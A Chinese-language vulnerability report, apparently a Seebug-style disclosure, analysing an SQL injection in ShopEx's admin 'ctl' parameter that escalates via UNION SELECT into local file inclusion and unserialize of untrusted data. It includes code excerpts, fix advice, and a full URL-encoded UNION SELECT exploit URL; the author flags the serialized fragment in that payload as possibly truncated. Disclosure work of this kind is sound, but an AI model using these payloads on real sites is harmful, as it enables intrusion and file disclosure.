### 简要描述: sql注入,无连载 ### 详细说明: shopex后台登录地址: http://127.0.0.1/shopadmin/index.php?ctl=passport&act=login 分析代码: \core\include_v5\adminCore.php ``` public function adminCore( ) ...... $mod = $_GET['ctl'] ? $_GET['ctl'] : "default"; ...... $controller =& $this->getController( $mod ); ``` $mod 直接取自我们提交的 GET 参数 ctl，这里看不到任何过滤或白名单校验。在下面找到函数getController: ``` public function &getController( $mod, $args = null ) { if ( !class_exists( "pageFactory" ) ) { require( "pageFactory.php" ); } $baseName = basename( $mod, $args ); $dirName = dirname( $mod ); if ( $dirName == "plugins" ) { $addon =& $this->loadModel( "system/addons" ); $object =& $addon->load( $baseName, "admin" ); $object->db =& $this->database( ); } else { $fname = CORE_DIR."/admin/controller/".$dirName."/ctl.".$baseName.".php"; ``` 关键逻辑: if ( $dirName == "plugins" ) $addon =& $this->loadModel( "system/addons" ); $object =& $addon->load( $baseName, "admin" ); 也就是说，只要 ctl 形如 `plugins/xxx`，dirname() 得到 "plugins"，basename() 得到的 xxx 就会原样传给 load()。在文件\core\model_v5\system\mdl.addons.php中: ``` public function &load( $name, $type ) { if ( ( $type == "app" || $type == "shop" || $type == "admin" ) && !class_exists( "app" ) ) { require( "app.php" ); } $data = $this->db->selectrow( "SELECT plugin_id,plugin_path,plugin_struct,plugin_config,plugin_base FROM sdb_plugins WHERE plugin_type='{$type}' AND plugin_ident='{$name}'" ); return $this->plugin_instance( $data ); } ``` 最终我们提交的 ctl（basename 部分）变成了变量 $name，被直接拼接进 SELECT 语句的 WHERE 子句，既没有参数化也没有转义；而且 shopex 已经对输入变量做过反转义，单引号可以原样到达 SQL，这里因此形成 SQL 注入漏洞。继续看plugin_instance( $data ) ``` public function plugin_instance( $data ) { $sturct = unserialize( $data['plugin_struct'] ); $classname = $sturct['class_name']; if ( !$classname ) { return false; } if ( $data['plugin_base'] == 0 ) { if ( file_exists( PLUGIN_DIR.$data['plugin_path'] ) ) { require_once( PLUGIN_DIR.$data['plugin_path'] ); ``` 注意 require_once( PLUGIN_DIR.$data['plugin_path'] ); 这一行：由于 $data 整行来自可注入的查询，攻击者可以用 UNION SELECT 完全控制 plugin_struct、plugin_path、plugin_base 等每一列。plugin_struct 会被直接 unserialize()（对不可信数据反序列化），plugin_path 在 plugin_base 为 0 且目标文件存在时会被 require_once()，于是 SQL 注入进一步升级为本地文件包含。修复建议：load() 中对 $name、$type 使用参数化查询（或至少做严格转义），getController() 中对 ctl 做白名单校验（例如仅允许 [A-Za-z0-9_/]），并且不要把从数据库取出的路径未经校验就交给 require_once()。 ### 漏洞证明: http://127.0.0.1/shopadmin/index.php?ctl=plugins/pp.php%27 [<img src="https://images.seebug.org/upload/201306/2523352387b7c851b71a6a243c9586c8c8abc049.jpg" alt="shopex_1.jpg" width="600" 
>](https://images.seebug.org/upload/201306/2523352387b7c851b71a6a243c9586c8c8abc049.jpg) 本地文件包含 ./../readme.txt：下面的 payload 先用 `pp.php' and 1=2` 使原查询无结果，再用 UNION SELECT 构造整行返回值。其中 0x2E2F2E2E2F726561646D652E747874 是字符串 "./../readme.txt" 的十六进制形式，作为 plugin_path 拼在 PLUGIN_DIR 之后实现目录穿越；plugin_base 置为 0 以进入 require_once 分支；末尾的 %23（#）注释掉原 SQL 剩余的 `'` 部分。plugin_struct 列需要填入一段反序列化后 class_name 非空的数据才能通过 `if ( !$classname )` 检查——此处展示的序列化片段以 `s:5:"funcs"` 开头而非数组头，疑为转载时被截断，复现时请核对。 http://127.0.0.1/shopadmin/index.php?ctl=plugins/pp.php%27%20and%201=2%20union%20select%20plugin_id,0x2E2F2E2E2F726561646D652E747874%20as%20plugin_path,%27s:5:%22funcs%22;a:9:{s:13:%22action_member%22;s:13:%22action_member%22;s:7:%22actions%22;s:7:%22actions%22;s:8:%22changelv%22;s:8:%22changelv%22;s:8:%22addpoint%22;s:8:%22addpoint%22;s:8:%22delpoint%22;s:8:%22delpoint%22;s:10:%22addadvance%22;s:10:%22addadvance%22;s:10:%22deladvance%22;s:10:%22deladvance%22;s:10:%22sendcoupon%22;s:10:%22sendcoupon%22;s:6:%22settag%22;s:6:%22settag%22;}}%27%20as%20plugin_struct,plugin_config,0%20as%20plugin_base%20FROM%20sdb_plugins%20limit%201%23 [<img src="https://images.seebug.org/upload/201306/252337283e38b765e982b34f3a6e0106f879a31b.jpg" alt="shopex_2.jpg" width="600">](https://images.seebug.org/upload/201306/252337283e38b765e982b34f3a6e0106f879a31b.jpg)